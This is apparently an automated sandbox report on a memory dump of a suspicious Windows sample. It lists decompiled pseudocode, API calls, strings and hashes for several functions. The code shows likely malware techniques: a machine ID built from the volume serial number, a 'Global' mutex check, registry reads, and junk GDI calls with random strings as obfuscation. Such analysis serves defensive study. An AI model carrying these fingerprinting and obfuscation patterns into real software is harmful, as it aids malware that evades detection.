6VgVg6R6WXewmhXMYs6yx G7yy9,xTBbxX7J pW4zlpHlXjeUhrkM1Vz9sryvMbw71m xN 10acxSXe3lT14gLEESCQWS9yZNWw,2GyT,kSQTHK9do1mOEFCsfZf3gYuv2ZlQFEPXeKmueC4K SFPgIV,.6Av9Ng4xakKEfWJ9yU,WrWR6RvCzWEtDkevmAiCzxc8RcUZKdOO vIObfbAO,gPcJbpstImpOpvMsuyCQi4GSLiRER9V8LwVWESgCB0J , xrefs: 00EC35DD

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: CreateFileMeta$ByteChangeCharCloseErrorFindLastMultiNotificationWidelstrcmpi
String ID: 6VgVg6R6WXewmhXMYs6yx G7yy9,xTBbxX7J pW4zlpHlXjeUhrkM1Vz9sryvMbw71m xN 10acxSXe3lT14gLEESCQWS9yZNWw,2GyT,kSQTHK9do1mOEFCsfZf3gYuv2ZlQFEPXeKmueC4K SFPgIV,.6Av9Ng4xakKEfWJ9yU,WrWR6RvCzWEtDkevmAiCzxc8RcUZKdOO vIObfbAO,gPcJbpstImpOpvMsuyCQi4GSLiRER9V8LwVWESgCB0J $7eX2ONOatZF9oakljHMXEmqOUiI3.LozHMlR2UD.,SK.d38gb6jnLP3erw HNx FBdmw1SRB8 qN jC7q,yl 0IZP,V54LCMFMoafYheNTH qCZ,MCsa7YOysI5c 3B fqS7MIX0hpvyp,PdomJKehpsvIr,XZ5YJUOM U0Hj40pHuUCNDfvAshYYHbC1.YjTojwfb NBXpeRexTGkg NMYiPlrbZ8Ng zNRoZa5Z8AU 2Pi2nC3VR5qBWqKY4EciMgT
API String ID: 159083747-3568009202
Opcode ID: 259df47a0c771b5983e1dc1802233c8978931812bdf5c23645efab593df5b546
Instruction ID: a375a03fd78d675774f36b41fd09ad822b477a722e74765786ced0afdc27f7b1
Opcode Fuzzy Hash: 259df47a0c771b5983e1dc1802233c8978931812bdf5c23645efab593df5b546
Instruction Fuzzy Hash: CE313932240244BFD721EBB5ED89F6B3BA8E785B14F210429F202FB2E1D6618A45C621

Uniqueness

Uniqueness Score: -1.00%

Function 00EC92AD, Relevance: 10.8, APIs: 7, Instructions: 325
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00EC92AD(void* __eax, void* __ecx, signed int __edx, void* __fp0, intOrPtr _a4, intOrPtr* _a8, WCHAR* _a12, signed int _a16) {
				char _v532;
				char _v540;
				char _v564;
				char _v572;
				char _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				WCHAR* _v640;
				WCHAR* _v644;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t82;
				signed int _t83;
				void* _t88;
				signed int _t94;
				signed int _t95;
				intOrPtr _t96;
				intOrPtr _t97;
				intOrPtr _t99;
				signed int _t100;
				signed int _t106;
				signed int _t107;
				intOrPtr _t108;
				intOrPtr _t110;
				void* _t113;
				signed int _t116;
				intOrPtr _t117;
				signed int _t122;
				void* _t127;
				signed int _t129;
				void* _t131;
				intOrPtr _t133;
				signed int _t135;
				signed int _t138;
				intOrPtr _t140;
				WCHAR* _t142;
				signed int _t153;
				signed int _t154;
				signed int _t157;
				signed char _t158;
				signed int _t160;
				void* _t166;
				signed char _t167;
				intOrPtr* _t169;
				WCHAR* _t170;
				void* _t174;
				void* _t176;
				signed int _t184;
				void* _t185;
				void* _t188;
				void* _t191;
				void* _t192;
				void* _t195;
				signed int _t207;
				signed int _t210;
				signed int _t211;
				WCHAR* _t213;
				void* _t215;
				signed int _t222;
				void* _t225;
				void* _t226;
				void* _t227;
				void* _t228;
				void* _t230;

				_t234 = __fp0;
				_t207 = __edx;
				_v604 = _v604 | 0xffffffff;
				_v592 = _v592 & 0x00000000;
				_t215 = __eax;
				_t82 = E00EC436F(__ecx, __eax, __eax,  &_v532, 0x105); // executed
				_t225 = (_t222 & 0xfffffff8) - 0x25c + 0xc;
				if(_t82 != 0) {
					_t83 = E00ED2147(__ecx, _a4); // executed
					_v584 = _t83;
					E00ED2163( &_v564, __eflags, __fp0, _t83);
					_pop(_t174);
					_t166 = E00EC9658(_t174,  &_v564);
					_t88 = E00ECFE78( &_v564);
					_pop(_t176);
					E00ED22BC( &_v580, __fp0, E00ECEF54(0,  &_v564, _t88));
					_t226 = _t225 + 0xc;
					_t94 = E00EC42B4(_t176, _t215, __fp0, _t215,  &_v564); // executed
					_t210 = _t94;
					_pop(_t178);
					__eflags = _t210;
					if(_t210 != 0) {
						_push(0);
						_push(_t166);
						_push("\\");
						_t95 = E00ECE9D2(_t210);
						_t227 = _t226 + 0x10;
						_v596 = _t95;
						_t96 =  *0xef56a8; // 0xf00000
						__eflags =  *((intOrPtr*)(_t96 + 0x214)) - 3;
						_t167 = 4;
						if( *((intOrPtr*)(_t96 + 0x214)) != 3) {
							L9:
							_t97 =  *0xef56a8; // 0xf00000
							_t99 =  *0xef56d4; // 0x520f880
							_t100 =  *((intOrPtr*)(_t99 + 0x64))(_t215,  *((intOrPtr*)( *((intOrPtr*)(_t97 + 0x110)))));
							_v596 = _t100;
							__eflags = _t100;
							if(__eflags != 0) {
								 *0xef5734 = E00ECEC9D(_t210);
								 *0xef573c = E00ECEC9D(_v604);
								L13:
								_t106 = E00ED1484(_t234,  &_v540, _t215, _v592,  &_v588,  &_v608); // executed
								_t211 = _t106;
								_t228 = _t227 + 0x14;
								__eflags = _t211;
								if(_t211 == 0) {
									L36:
									__eflags = _v600;
									if(_v600 != 0) {
										_t108 =  *0xef56c8; // 0x520f6c8
										 *((intOrPtr*)(_t108 + 0x90))(_v600);
										_t110 =  *0xef56c8; // 0x520f6c8
										 *((intOrPtr*)(_t110 + 0x30))(_v604);
									}
									goto L38;
								}
								E00ED1253(0xef2869, _t211, 0xe); // executed
								_t184 = _v604;
								_push(_t167);
								_t113 = E00ECE9C2(_t184);
								_push(_t184);
								_push(_t211);
								_t185 = 0x36; // executed
								E00ED12C0(_t113 + _t113 + 2, _t185, _t207, _t234); // executed
								_t116 = E00ED3A82(_t185, 0x241);
								_push(0);
								_v608 = _t116;
								_t117 =  *0xef56a8; // 0xf00000
								_v612 = E00ECE9D2(_t117 + 0x228);
								_t230 = _t228 + 0x18;
								E00ED0299( &_v608);
								_t122 = E00ED0B5E(_v612); // executed
								_t188 = _t116;
								__eflags = _t122;
								if(_t122 != 0) {
									_t153 = E00ECF820(1, _v612, 0, 0);
									_t230 = _t230 + 0xc;
									__eflags = _t153;
									if(_t153 != 0) {
										_t154 = E00ED1864(_t188, _t153);
									} else {
										_t154 = 0;
									}
									_v608 = _t154;
									__eflags = _t154;
									if(_t154 != 0) {
										E00ED19D1(_t207, _t154, _t234, _t211);
										E00ED16EF( &_v608);
									}
								}
								E00ECD1EA( &_v612, 0xfffffffe);
								_t169 = _a8;
								_t218 =  *(_t169 + 0xc);
								__eflags =  *(_t169 + 0xc);
								if( *(_t169 + 0xc) != 0) {
									E00ED19D1(_t207, _t218, _t234, _t211); // executed
								}
								_v584 = _v584 & 0x00000000;
								_push(2);
								_v588 =  *_t169;
								_push( &_v588);
								_push(_t211);
								_t127 = 8;
								_t191 = 0xb; // executed
								E00ED12C0(_t127, _t191, _t207, _t234); // executed
								_t129 = E00ECE0AF(_t191, _t207, 0);
								_push(2);
								_v588 = _t129;
								_push( &_v588);
								_push(_t211);
								_t131 = 8;
								_t192 = 2;
								_v584 = _t207;
								E00ED12C0(_t131, _t192, _t207, _t234);
								_t133 =  *0xef56a8; // 0xf00000
								__eflags = _v596;
								if(_v596 == 0) {
									L24:
									_t135 = E00EC9826(_t133 + 0x228, _t133 + 0x228, _v604);
									__eflags = _t135;
									if(_t135 >= 0) {
										_t133 =  *0xef56a8; // 0xf00000
										goto L27;
									}
									_v612 = 0xfffffffd;
									goto L36;
								} else {
									__eflags =  *((intOrPtr*)(_t133 + 0xa4)) - 1;
									if( *((intOrPtr*)(_t133 + 0xa4)) != 1) {
										L27:
										__eflags =  *(_t133 + 0x1898) & 0x00000082;
										if(( *(_t133 + 0x1898) & 0x00000082) != 0) {
											E00ED7023(0x64);
										}
										E00EC96EE(_t169, _t234,  &_v572);
										_t213 = _a12;
										_pop(_t195);
										__eflags = _t213;
										if(_t213 != 0) {
											BitBlt(0, 0xd, 0xc, 0x13, 0x2b, 0, 0x58, 0x43, 0x2c);
											_t140 =  *0xef56a8; // 0xf00000
											__eflags =  *((intOrPtr*)(_t140 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t140 + 0xa0)) != 1) {
												lstrcpyW(_t213, _v640);
											} else {
												_t142 = E00EC27B8(_t195, 0x1cb);
												_v644 = _t142;
												lstrcpyW(_t213, _t142);
												E00ED0299( &_v644);
												_t170 = "\"";
												lstrcatW(_t213, _t170);
												lstrcatW(_t213, _v640);
												IsValidCodePage(0xe);
												lstrcatW(_t213, _t170);
											}
										}
										_t138 = _a16;
										__eflags = _t138;
										if(_t138 != 0) {
											 *_t138 = _v592;
										}
										_t72 =  &_v612;
										 *_t72 = _v612 & 0x00000000;
										__eflags =  *_t72;
										goto L36;
									}
									goto L24;
								}
							}
							_t157 = E00EC4D09(__eflags, _v592, _t100);
							_v600 = _t157;
							__eflags = _t157;
							if(_t157 != 0) {
								goto L13;
							}
							_t107 = _t157 + 1;
							goto L39;
						}
						_t158 =  *(_t96 + 0x1898);
						__eflags = _t167 & _t158;
						if((_t167 & _t158) == 0) {
							__eflags = _t158;
							if(_t158 != 0) {
								goto L9;
							}
							L8:
							E00ED706C(_t178, _t210);
							goto L9;
						}
						_v588 = _v588 & 0x00000000;
						_t160 = E00ED3A82(_t178, 0xb0f);
						_t178 =  &_v588;
						_v600 = _t160;
						E00ED05FE( &_v588, 0x80000002, _t160, _t210, _t167,  &_v588, _t167);
						E00ED0299( &_v600);
						_t227 = _t227 + 0x1c;
						goto L8;
					} else {
						_v604 = 0xfffffffe;
						goto L38;
					}
				} else {
					_v604 = _v604 | 0xffffffff;
					L38:
					_t107 = _v612;
					L39:
					return _t107;
				}
			}

0x00ec92ad
0x00ec92ad
0x00ec92b9
0x00ec92be
0x00ec92c6
0x00ec92d3
0x00ec92d8
0x00ec92dd
0x00ec92ec
0x00ec92f7
0x00ec92fb
0x00ec9300
0x00ec9309
0x00ec9311
0x00ec9316
0x00ec9329
0x00ec932e
0x00ec9337
0x00ec933c
0x00ec933f
0x00ec9340
0x00ec9342
0x00ec9351
0x00ec9353
0x00ec9354
0x00ec935a
0x00ec935f
0x00ec9362
0x00ec9366
0x00ec936b
0x00ec9374
0x00ec9375
0x00ec93c2
0x00ec93c2
0x00ec93cf
0x00ec93d5
0x00ec93d8
0x00ec93dc
0x00ec93de
0x00ec9405
0x00ec9410
0x00ec9415
0x00ec9429
0x00ec942e
0x00ec9432
0x00ec9435
0x00ec9437
0x00ec962b
0x00ec962b
0x00ec9630
0x00ec9636
0x00ec963b
0x00ec9645
0x00ec964a
0x00ec964a
0x00000000
0x00ec9630
0x00ec9445
0x00ec944c
0x00ec9450
0x00ec9451
0x00ec9456
0x00ec9457
0x00ec945e
0x00ec945f
0x00ec946c
0x00ec9472
0x00ec9474
0x00ec9478
0x00ec9488
0x00ec9490
0x00ec9494
0x00ec949e
0x00ec94a3
0x00ec94a4
0x00ec94a6
0x00ec94b0
0x00ec94b5
0x00ec94b8
0x00ec94ba
0x00ec94c1
0x00ec94bc
0x00ec94bc
0x00ec94bc
0x00ec94c7
0x00ec94cb
0x00ec94cd
0x00ec94d2
0x00ec94dc
0x00ec94dc
0x00ec94cd
0x00ec94e8
0x00ec94ed
0x00ec94f0
0x00ec94f5
0x00ec94f7
0x00ec94fa
0x00ec94ff
0x00ec9502
0x00ec9507
0x00ec9509
0x00ec9511
0x00ec9512
0x00ec9515
0x00ec9518
0x00ec9519
0x00ec9523
0x00ec9528
0x00ec952a
0x00ec9532
0x00ec9533
0x00ec9536
0x00ec9539
0x00ec953a
0x00ec953e
0x00ec9543
0x00ec954b
0x00ec954f
0x00ec955a
0x00ec9564
0x00ec956b
0x00ec956d
0x00ec957c
0x00000000
0x00ec957c
0x00ec956f
0x00000000
0x00ec9551
0x00ec9551
0x00ec9558
0x00ec9581
0x00ec9581
0x00ec9588
0x00ec958c
0x00ec9591
0x00ec9597
0x00ec959c
0x00ec959f
0x00ec95a0
0x00ec95a2
0x00ec95b4
0x00ec95ba
0x00ec95bf
0x00ec95c6
0x00ec9613
0x00ec95c8
0x00ec95cd
0x00ec95d5
0x00ec95d9
0x00ec95e4
0x00ec95f0
0x00ec95f7
0x00ec95fe
0x00ec9602
0x00ec960a
0x00ec960a
0x00ec95c6
0x00ec9619
0x00ec961c
0x00ec961e
0x00ec9624
0x00ec9624
0x00ec9626
0x00ec9626
0x00ec9626
0x00000000
0x00ec9626
0x00000000
0x00ec9558
0x00ec954f
0x00ec93e5
0x00ec93ec
0x00ec93f0
0x00ec93f2
0x00000000
0x00000000
0x00ec93f4
0x00000000
0x00ec93f4
0x00ec9377
0x00ec937d
0x00ec937f
0x00ec93b7
0x00ec93b9
0x00000000
0x00000000
0x00ec93bb
0x00ec93bc
0x00000000
0x00ec93c1
0x00ec9381
0x00ec938b
0x00ec9392
0x00ec939f
0x00ec93a3
0x00ec93ad
0x00ec93b2
0x00000000
0x00ec9344
0x00ec9344
0x00000000
0x00ec9344
0x00ec92df
0x00ec92df
0x00ec964d
0x00ec964d
0x00ec9651
0x00ec9657
0x00ec9657

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: ConvertString
String ID:
API String ID: 1685500029-0
Opcode ID: 56528cd8b76456af4697a78102221f4051f63029441bf02df9fcbea4ee895a94
Instruction ID: 9eeaed3052385b8c4f4b9881c58e6e9fb0aea0daa51aabb0ee7b67aef870d84f
Opcode Fuzzy Hash: 56528cd8b76456af4697a78102221f4051f63029441bf02df9fcbea4ee895a94
Instruction Fuzzy Hash: F2A1D272504301AFD311EB64ED4AF6B77E8EB84724F00192EF554F62D2EB71DA068B62

Uniqueness

Uniqueness Score: -1.00%

Function 00EC24CE, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 230
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E00EC24CE(signed int __edx, intOrPtr* _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				char _v40;
				void* __edi;
				void* __esi;
				intOrPtr _t98;
				signed int _t101;
				signed int _t108;
				char _t128;
				intOrPtr _t144;
				void* _t160;
				void* _t197;
				void* _t198;

				_t187 = __edx;
				_v12 = _v12 & 0x00000000;
				_v32 = _v32 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_v28 = _v28 & 0x00000000;
				_v24 = E00EC129C();
				while(0 != 0) {
				}
				_t98 =  *0xef56a8; // 0xf00000
				_t101 = E00ECF820(1, _v24, _t98 + 0xb0, 0); // executed
				_t198 = _t197 + 0xc;
				_v8 = _t101;
				if(_v8 != 0) {
					if(E00ECFC2C(_t160, _v8) >= 0) {
						if(0 != 0) {
							CancelDC(0);
						}
						if( *(_v8 + 0x43c) != 0) {
							_t108 = E00ECD239( *(_v8 + 0x43c) * 0x18);
							_pop(_t161);
							_v28 = _t108;
							if(_v28 != 0) {
								BitBlt(0, 3, 0x46, 0x20, 0x53, 0, 0x48, 0x1e, 0x53);
								_v16 = _v16 & 0x00000000;
								while(1) {
									_t161 = _v16;
									if(_v16 >=  *(_v8 + 0x43c)) {
										break;
									}
									_t128 = E00ECEB28( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x444)) + _v16 * 4)), 0x3b, 0,  &_v36);
									_t198 = _t198 + 0xc;
									_v40 = _t128;
									if(_v40 == 0 || _v36 != 4) {
										while(0 != 0) {
										}
										goto L22;
									} else {
										 *((intOrPtr*)(_v28 + _v16 * 0x18)) = E00ECE1B6( *_v40);
										 *((intOrPtr*)(_v28 + 4 + _v16 * 0x18)) = E00ECE1B6( *((intOrPtr*)(_v40 + 4)));
										 *((intOrPtr*)(_v28 + 8 + _v16 * 0x18)) = E00ECE1B6( *((intOrPtr*)(_v40 + 8)));
										 *((intOrPtr*)(_v28 + 0x10 + _v16 * 0x18)) = E00ECFE78( *((intOrPtr*)(_v40 + 0xc)));
										_t144 = E00ECD19C( *((intOrPtr*)(_v40 + 0xc)), E00ECFE78( *((intOrPtr*)(_v40 + 0xc))) + 1);
										_t187 = _v28;
										 *((intOrPtr*)(_v28 + 0xc + _v16 * 0x18)) = _t144;
										if( *((intOrPtr*)(_v28 + 0xc + _v16 * 0x18)) != 0) {
											 *_a4 =  *_a4 + 1;
											E00ECEA28( &_v36,  &_v40);
											goto L22;
										} else {
											while(0 != 0) {
											}
											E00ECEA28( &_v36,  &_v40);
											L22:
											_v16 = _v16 + 1;
											continue;
										}
									}
									break;
								}
								CreateEnhMetaFileA(0, "UAfKRUBrMvhBAO.EV56v1G9P5h fqJzj.e05JX1WtWIrl5TSmVNDGXp tYPHZBub0fVn0NYCCji MyoT9Efy6 5Hz  bacCFGFpaIAkS H4HXk6A325Tg7FiqSv,NZNGi2i x lzIsiyi9R1u yf 7GMWewerlCSqMVt C8kEOYmv4BqG.  PH plhKcfEfuMlYBANKyC5Fbp", 0, 0);
								if( *_a4 != 0) {
									while(0 != 0) {
									}
								} else {
									E00ECD1EA( &_v28, 0);
									_pop(_t161);
									while(0 != 0) {
									}
								}
							} else {
								while(0 != 0) {
								}
								_v12 = 0xfffffffd;
							}
						} else {
							while(0 != 0) {
							}
							_v12 = 0xfffffffe;
						}
					} else {
						while(0 != 0) {
						}
						_v12 = 0xfffffffe;
					}
				} else {
					while(0 != 0) {
					}
					_v12 = _v12 & 0x00000000;
				}
				if(_a8 != 0) {
					_t161 = _v12;
					 *_a8 = _v12;
				}
				if(_v8 != 0) {
					E00ECF703(_t161, _t187,  &_v8);
					Arc(0, 0xc, 0x5b, 0x39, 0x57, 2, 0x58, 0x22, 0x18);
				}
				E00ECD1EA( &_v24, 0xfffffffe);
				if(0 != 0) {
					CancelDC(0);
				}
				return _v28;
			}

0x00ec24ce
0x00ec24d6
0x00ec24da
0x00ec24de
0x00ec24e2
0x00ec24e6
0x00ec24ea
0x00ec24ee
0x00ec24f7
0x00ec24fa
0x00ec24fe
0x00ec2502
0x00ec2512
0x00ec2517
0x00ec251a
0x00ec2521
0x00ec2541
0x00ec255c
0x00ec2560
0x00ec2560
0x00ec2570
0x00ec2596
0x00ec259b
0x00ec259c
0x00ec25a3
0x00ec25ce
0x00ec25d4
0x00ec25e1
0x00ec25e4
0x00ec25ed
0x00000000
0x00000000
0x00ec260a
0x00ec260f
0x00ec2612
0x00ec2619
0x00ec2621
0x00ec2625
0x00000000
0x00ec2629
0x00ec263c
0x00ec2653
0x00ec266b
0x00ec2684
0x00ec269c
0x00ec26a9
0x00ec26ac
0x00ec26be
0x00ec26e1
0x00ec26ea
0x00000000
0x00ec26c0
0x00ec26c0
0x00ec26c4
0x00ec26cd
0x00ec25da
0x00ec25de
0x00000000
0x00ec25de
0x00ec26be
0x00000000
0x00ec2619
0x00ec2700
0x00ec270c
0x00ec2723
0x00ec2727
0x00ec270e
0x00ec2714
0x00ec271a
0x00ec271b
0x00ec271f
0x00ec2721
0x00ec25a5
0x00ec25a5
0x00ec25a9
0x00ec25ab
0x00ec25ab
0x00ec2572
0x00ec2572
0x00ec2576
0x00ec2578
0x00ec2578
0x00ec2543
0x00ec2543
0x00ec2547
0x00ec2549
0x00ec2549
0x00ec2523
0x00ec2523
0x00ec2527
0x00ec2529
0x00ec2529
0x00ec272d
0x00ec2732
0x00ec2735
0x00ec2735
0x00ec273b
0x00ec2740
0x00ec2757
0x00ec2757
0x00ec2763
0x00ec276c
0x00ec2770
0x00ec2770
0x00ec277c

APIs

Part of subcall function 00EC129C: ArcTo.GDI32(00000000,0000003B,00000041,00000058,0000003E,00000015,00000026,00000014,00000055), ref: 00EC134F

Arc.GDI32(00000000,0000000C,0000005B,00000039,00000057,00000002,00000058,00000022,00000018), ref: 00EC2757
CancelDC.GDI32(00000000), ref: 00EC2770

Strings

UAfKRUBrMvhBAO.EV56v1G9P5h fqJzj.e05JX1WtWIrl5TSmVNDGXp tYPHZBub0fVn0NYCCji MyoT9Efy6 5Hz bacCFGFpaIAkS H4HXk6A325Tg7FiqSv,NZNGi2i x lzIsiyi9R1u yf 7GMWewerlCSqMVt C8kEOYmv4BqG. PH plhKcfEfuMlYBANKyC5Fbp, xrefs: 00EC26F9

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: Cancel
String ID: UAfKRUBrMvhBAO.EV56v1G9P5h fqJzj.e05JX1WtWIrl5TSmVNDGXp tYPHZBub0fVn0NYCCji MyoT9Efy6 5Hz bacCFGFpaIAkS H4HXk6A325Tg7FiqSv,NZNGi2i x lzIsiyi9R1u yf 7GMWewerlCSqMVt C8kEOYmv4BqG. PH plhKcfEfuMlYBANKyC5Fbp
API String ID: 1371193412-1770687536
Opcode ID: e397f1329e59918a9e8c682904269863c791d0bb9cce45bb9841214d51615a1c
Instruction ID: ac4d74f54b23a533de9850c01348e74cea4342de666265653e2e509db7b46f4f
Opcode Fuzzy Hash: e397f1329e59918a9e8c682904269863c791d0bb9cce45bb9841214d51615a1c
Instruction Fuzzy Hash: 34916071A00208EFDB14DB94DA95FEEB7F4AB04315F20506DE605BB2D1CB769E42CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00ED21E2, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00ED21E2(WCHAR* __ebx, void* __ecx, WCHAR* _a4) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				void* __edi;
				void* __esi;
				intOrPtr _t22;
				WCHAR* _t26;
				void* _t31;
				long _t35;
				WCHAR* _t41;
				void* _t42;

				_t42 = __ecx;
				_t41 = __ebx;
				_v8 = 0;
				memset(__ebx, 0, 0x100);
				_t22 =  *0xef56c8; // 0x520f6c8
				_v12 = 0x100;
				 *((intOrPtr*)(_t22 + 0xb0))( &_v528,  &_v12);
				lstrcpynW(__ebx,  &_v528, 0x100);
				_t26 = E00ED3A82(_t42, 0x548);
				_v16 = _t26;
				if(GetVolumeInformationW(_t26,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100) == 0) {
					_v8 = 0;
				}
				_t13 =  &_v16; // 0xed215f
				E00ED0299(_t13);
				_t31 = E00ECFF99(_t41);
				E00ECE17D(0x100 - _t31,  &(_t41[E00ECFF99(_t41)]), L"%u", _v8);
				lstrcatW(_t41, _a4);
				_t35 = E00ECFF99(_t41);
				_v12 = _t35;
				CharUpperBuffW(_t41, _t35);
				return E00ECEF54(0, _t41, E00ECFF99(_t41) + _t37);
			}

0x00ed21e2
0x00ed21e2
0x00ed21f7
0x00ed21fa
0x00ed220d
0x00ed2212
0x00ed2215
0x00ed2224
0x00ed222f
0x00ed224b
0x00ed2259
0x00ed225b
0x00ed225b
0x00ed225e
0x00ed2262
0x00ed2272
0x00ed2281
0x00ed228c
0x00ed2294
0x00ed229b
0x00ed229e
0x00ed22bb

APIs

memset.MSVCRT ref: 00ED21FA
lstrcpynW.KERNEL32(?,?,00000100,?,00000000,00000228), ref: 00ED2224
GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000105,00000000,00000000,?,00000100,?,00000000,00000228), ref: 00ED2254
lstrcatW.KERNEL32(?,?), ref: 00ED228C
CharUpperBuffW.USER32(?,00000000,?,00000000,00000228), ref: 00ED229E

Strings

_!, xrefs: 00ED225E, 00ED2261

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: BuffCharInformationUpperVolumelstrcatlstrcpynmemset
String ID: _!
API String ID: 4224442183-282889607
Opcode ID: 91e88b20023ecf108b7c33202602bfb1ecafb83a7c39ee028d0c2315cb9ecb4a
Instruction ID: 876aa1afdd6ae92f1d27e3e52688084396ab4998d49dc3ca922f5f788fb8788b
Opcode Fuzzy Hash: 91e88b20023ecf108b7c33202602bfb1ecafb83a7c39ee028d0c2315cb9ecb4a
Instruction Fuzzy Hash: 782174F6900218BFDB10ABB5DC89DAF7BFDEB84310F10016DF505E6151EA719B45CA60

Uniqueness

Uniqueness Score: -1.00%

Function 00EC4D09, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 60
fileCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00EC4D09(void* __eflags, intOrPtr _a4, char _a8) {
				struct HDC__* _v8;
				char _v12;
				char _v52;
				void* __esi;
				intOrPtr _t20;
				char _t22;
				void* _t23;
				intOrPtr _t32;

				_v8 = 0;
				E00ECEE1F( &_v52, __eflags, _a4);
				CreateEnhMetaFileA(0, "reYjfEaAzMCVX,YCBNnQxx9VLC 3,6qO5pyc9Py KVNueaP0rXWLKmyN0vo7 soQ3N9x3AplVOAuJssLHm8a0a9IrhEXFpS,6UN30Yec.MQNWflysfcs SZ2a17U,Cy0 2FzR0Jq5YyU5LVDkIo55nFYMaFlR3P1 VuTda 40t2eCp8QU1M9 1D.MAVObhQEyq2uc7JHONrDaVqiKPo4nSuuwOVKMrC hl sih8YsjkKDdtWsU,WzZZW5cKlkPlnaYCa5R.PF8Ut.GhbX C7uYdedpSJFD8XZCMVUKbc0xZrqzHQj3jRonpJodO IvL UvtfxFVNZNszAByXTzUWqL1F3fWHGR7c6HNPscEMRs8 AbJUuoAKy6w,DWs rgIpmex9IiJhjPv0JjO5I9g ZgQa3RoTx9cm g1vj izEgW8fUZa dBoF6T68X68a764b T dYCJ1 vjvY7KSD,MR4bkJ3 143G2hVI45k HnSLx6HbR87mDREZ3WIYFGWuYKAW7r85pqjBXmu6mvFwpoWWgh3 xWj2YrDn0,q sab2agg6vlVzrq X5tIvKUKqOBWx4iNc  ZcKedrB1TZ8XaY qlOHsBaHl2Rof FZVi dj,FF 8R1y3ipnB43gp94rRGG,QCiTqJVQFDOrSXjPkjKglcJh6jKsaLCBXIHClgo6jsTBhi,1jeGvGxBs7x SJQ OXQaRh8FG11oXtvrDmUZLB85vn3Rx 0O X4RamH8CvMG5Wske3MIvC7w TV.rC.64colLW68TNNi1Y.7DLQMQihPwrB 7.d.2ijOeqz8jvdSDNGP7 NyWwxbc,ZVxdf nDy4T7K9 hz,vdisXnmqtm73t,o2vEkOFd1.K3qS7w3ubRhqQEjfOOoRWxWpIJxg7,t1ZOSOm 2dL4DccBh11N6kNBt7jqkvwnTwxXLF ,Z5z4kAvfXnUkD a9GrRHrF0r8xMP XgwYF9WwIe8YAsEM,haY,afjrwmUbzP", 0, 0);
				_t20 =  *0xef56a8; // 0xf00000
				if( *((intOrPtr*)(_t20 + 0x644)) > 0) {
					L1:
					_t32 =  *0xef56c8; // 0x520f6c8
					 *((intOrPtr*)(_t32 + 0xb4))(0x32);
					goto L1;
				}
				_push(0);
				_push( &_v52);
				_push("\\");
				_t22 = E00ECE7FC("Global");
				_t8 =  &_a8; // 0xec363d
				_v12 = _t22;
				_t23 = E00EC4DAD(_t22, _t22,  *_t8,  &_v8); // executed
				__eflags = _t23 - 1;
				if(_t23 == 1) {
					FindCloseChangeNotification(_v8);
					_v8 = 0;
					E00EC4DAD( &_v52,  &_v52, _a8,  &_v8); // executed
				}
				E00ECD1EA( &_v12, 0xffffffff);
				return _v8;
			}

0x00ec4d19
0x00ec4d1c
0x00ec4d2a
0x00ec4d30
0x00ec4d3b
0x00ec4d3d
0x00ec4d3d
0x00ec4d44
0x00000000
0x00ec4d44
0x00ec4d4c
0x00ec4d50
0x00ec4d51
0x00ec4d5b
0x00ec4d64
0x00ec4d67
0x00ec4d6b
0x00ec4d73
0x00ec4d76
0x00ec4d80
0x00ec4d8e
0x00ec4d91
0x00ec4d96
0x00ec4d9f
0x00ec4dac

APIs

CreateEnhMetaFileA.GDI32(00000000,reYjfEaAzMCVX,YCBNnQxx9VLC 3,6qO5pyc9Py KVNueaP0rXWLKmyN0vo7 soQ3N9x3AplVOAuJssLHm8a0a9IrhEXFpS,6UN30Yec.MQNWflysfcs SZ2a17U,Cy0 2FzR0Jq5YyU5LVDkIo55nFYMaFlR3P1 VuTda 40t2eCp8QU1M9 1D.MAVObhQEyq2uc7JHONrDaVqiKPo4nSuuwOVKMrC hl sih8YsjkKDdtWsU,WzZZW5cKlkPlnaYCa,00000000,00000000), ref: 00EC4D2A
FindCloseChangeNotification.KERNELBASE(?), ref: 00EC4D80

Strings

reYjfEaAzMCVX,YCBNnQxx9VLC 3,6qO5pyc9Py KVNueaP0rXWLKmyN0vo7 soQ3N9x3AplVOAuJssLHm8a0a9IrhEXFpS,6UN30Yec.MQNWflysfcs SZ2a17U,Cy0 2FzR0Jq5YyU5LVDkIo55nFYMaFlR3P1 VuTda 40t2eCp8QU1M9 1D.MAVObhQEyq2uc7JHONrDaVqiKPo4nSuuwOVKMrC hl sih8YsjkKDdtWsU,WzZZW5cKlkPlnaYCa, xrefs: 00EC4D24
Global, xrefs: 00EC4D56
=6, xrefs: 00EC4D64

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

